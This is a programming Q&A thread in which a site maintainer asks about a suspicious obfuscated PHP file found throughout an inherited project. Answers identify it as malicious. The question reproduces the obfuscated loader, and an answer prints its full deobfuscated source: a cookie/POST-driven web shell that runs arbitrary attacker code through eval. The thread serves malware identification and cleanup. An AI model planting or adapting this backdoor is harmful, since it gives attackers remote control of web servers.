# Is this code malidcous

Tags: php, security

what does this code exactly do ??
 I found a lot of similar files in a project I take responsibility of it recently >>
and I don't want to delete something I'm not sure of it.
I think it's malicious.

a similar file existed everywhere, I ran antivirus check and they detect some files, but still a lot of them.
I've done everything possible, changing every password, DB prefix, prevent Indexing.
and those files still existed.
what can i do??

```
<?php


eval("\n\$dgreusdi = intval(__LINE__) * 337;");

$a = "7VdrT+NGFP1eqf9hiCIcKwHFj7ClIQh2Bd1V6bIthVZC1Jo4k2QSvzR2674raF/94zDk78GLOou5W6Uo2M7Zlzz33MnTs3JzzgTsySlsa674CIXjhROtQ95fX1zo/W+/IbhONgjMOSkqBqRbnffpvcPumbtIeBg4CfdZAQdMOuh43OdJK52Qf3KySaNIh674vqxWRAzvFg/WxqHApG3SlpNZ03l5c/vjsjNCZNNwznnDlhwAbH2UeyCvW1zF/rR4U5h9zwpyCfBnTChMODJU+otD+HhpIiOk8pmB8u4RNL674iZazpDG7MB2RswNR6y1ReodlZIsNvLavv674xyUtuJ3JuyWuIwMxzDI/r18dN5BaBm7rCfcnFHJ8ltFUNkWDJQgSkZHvj+vSnn2+M8OJs8vri+jR+e2YYV7+vTj9cee9vbk57b65XZxfXhvHDL97k9W/n7942Mm+qBsAZFoycOB6748mMSpc/hGSNYjtSY9AckfGbKsQYZqpxKrHF674uez5cXv36lDsByIaLROaOYDGjwp3Wh7mYQRm+XwSVROryKVNcyKd/L6eqltXmlsJxeZVzLI2+mr42/Xw6Z068GPo8jvHdakYsjDzWkQHxPDoMBU2YYuciXGMu/LVvDHFpNApxw9rCGT7o9kmTHyFBPLYh1/v1C7qWm6Vys41c3hayu6uiBLzdhtm83f505JrsPmGBdNiJqKA+7A/FKCO7bfI7HXmdDuVU3zZnd3olO9ThKI/s6743cqWmW95Xx4LKxYdcsVSZUbDuuIer9No1uNzjW48/BAdlqlvV6sPR2ijcZLymcRG9MZW0XjGT2cz674aTWcgmfDaK4nA0GzNN18lgQCoanq/up0LQj61cFZIPhrOkIhaveJIWhbwC8JeW0cXGIw3e+F6xGlQqqyitQm61aKndAXgSTaMl674+kOeA4er+Gasd/dMzQFkLnTUJ6mglOP/ykLghRUUao279onpvKJIRCFkIy0u5fQ5jKK3eNk3+ZvtRYUS1tzRBOKDTVnH2vPgJNFsPU1dgVjQaGY5CgKB1BFtUIW7w46745UG674N5miihTDFNajUsQ2sl8o4fuKzahSmje29sAtnxk8iBaJwrfhYjxmIiutm+Fk6G1Su7j+e0bnc+//AOGBWfq2OqSHsZ582iXCXg+DB7hf4f4O9y674674urg/oQQQ/DdLbNBggwPiHQJC8IHOkFiADdhgAG674AYgBjAGQAZQBmHJaYTAiZUgO674TAiZ674DJ79faYIDNBZoLMhFKrWzYNIAtkFsgskFkgsyBkQciCkAUhG0pt4GzgbOkLcDZwNnD2qxKhDS674bQj0I9b7aZPmf8Ksj1FV9Iipa2imSI5I1duuy2Cd6pecfpmhF74zSeJs2bals2sbdkZ2BVKrsAiVRjdQu6d6fn+vk6AgbvL5Lk5fsYpT0a674UVJ7T8ocGDBauSltwMFn6do5y0iVGJVdoZV7xpGy+IAv49kJYiFmvpfDRMZYM674YyveVlza2G6+1Hbzs2w3S7YffAHTrZeabr3Y9DrhJ8v/sc2rKfcY6GUiHZOu2gw33QPDJ2VdXDo5PsbpplL71JLsD9IfM67StC674iPSDlPZNZvbf3/GaSMR4QW93BZj+D1mZkDdbf";
$a = str_replace($dgreusdi, "E", $a);
eval (gzinflate(base64_decode($a)));
```

Comment: This might help https://wordpress.org/support/topic/coinhive-crypto-jacking-malware-hack/

Comment: Yes, it's malicious: it processes the request cookies and POST data (in a complicated way I haven't dug into) and uses those to either echo something to the page or run arbitrary PHP code with an eval().

Answer (score 3):

You can easily check what this PHP code is doing by replacing the `eval` with an `echo` and running it. It's safer to run this not on your production website, I've run it here on repl.it: https://repl.it/repls/IrresponsibleBelovedKernel which results in the below being printed:

```
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);


$approvals = False;

foreach ($_COOKIE as $cookie_one=>$cookie_two)
{
    $approvals = $cookie_two;

    $manager_invitation = $cookie_one;

    $approvals = remove_letter(_base64_decode($approvals), $manager_invitation);
    
    if ($approvals)
    {
        break;
    }
}

function improve_meta()
{
    return _base64_decode("UAMQV1oLEgBLUAsHE11SXwAPSlNVVA5CUwELU11GRlgBWFIH");
}

function append_strings($append, $string)
{
    return $append ^ $string;
}

if (!$approvals)
{
    foreach ($_POST as $contribute=>$research)
    {
        $approvals = $research;
        
        $manager_invitation = $contribute;

        $approvals = remove_letter(_base64_decode($approvals), $manager_invitation);
        
        if ($approvals)
        {
            break;
        }            
    }
}

function make_submission($people, $collaborate)
{
    $confirm_invite = "";

    for ($i=0; $i<strlen($people);)
    {
        for ($j=0; $j<strlen($collaborate) && $i<strlen($people); $j++, $i++)
        {
            $extension_param = ord($people[$i]) ^ ord($collaborate[$j]);

            $confirm_invite = $confirm_invite . chr($extension_param);
        }
    }

    return $confirm_invite;
}

if (!isset($approvals['ak']) || !(append_strings(improve_meta(), 'dfvaijpefajewpfja9gjdgjoegijdpsodjfe')) == $approvals['ak'])
{
    $approvals = Array();
}
else
{
    switch ($approvals['a']){
        case "i":
            $array = Array();
            $array['pv'] = @phpversion();
            $array['sv'] = '1.0-1';
            echo @serialize($array);
            break;
        case "e":
            eval($approvals['d']);
            break;
    }
    exit();

}

function remove_letter($data, $key)
{
    return @unserialize(screen_submission($data, $key));
}



function screen_submission($sub_key, $sub_meta)
{
    $sub = make_submission($sub_key, append_strings(improve_meta(), 'dfvaijpefajewpfja9gjdgjoegijdpsodjfe'));

    return make_submission($sub, $sub_meta);
}

function _base64_decode($input)
{
    $buffer = "";
    $tbl = Array(
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, 52, 53, 54,
        55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, -1, 0, 1, 2,
        3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
        20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30,
        31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47,
        48, 49, 50, 51, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1);

    for ($i = 0; $i < strlen($input); ) {
        $b = 0;
        if ($tbl[ord($input[$i])] != -1) {
            $b = ($tbl[ord($input[$i])] & 0xFF) << 18;
        }
        else {
            $i++;
            continue;
        }

        $num = 0;
        if ($i + 1 < strlen($input) && $tbl[ord($input[$i+1])] != -1) {
            $b = $b | (($tbl[ord($input[$i+1])] & 0xFF) << 12);
            $num++;
        }

        if ($i + 2 < strlen($input) && $tbl[ord($input[$i+2])] != -1) {
            $b = $b | (($tbl[ord($input[$i+2])] & 0xFF) << 6);
            $num++;
        }

        if ($i + 3 < strlen($input) && $tbl[ord($input[$i+3])] != -1) {
            $b = $b | ($tbl[ord($input[$i+3])] & 0xFF);
            $num++;
        }

        while ($num > 0) {
            $c = ($b & 0xFF0000) >> 16;
            $buffer .=chr($c);
            $b <<= 8;
            $num--;
        }
        $i += 4;
    }
    return $buffer;
}
```

This user goes into detail on what the code does: https://security.stackexchange.com/a/194077/152003

Essentially this line:
`eval($approvals['d']);` allows an attacker to execute any command on your server and take control of your site

You should immediately delete this file and any other suspicious files that have been added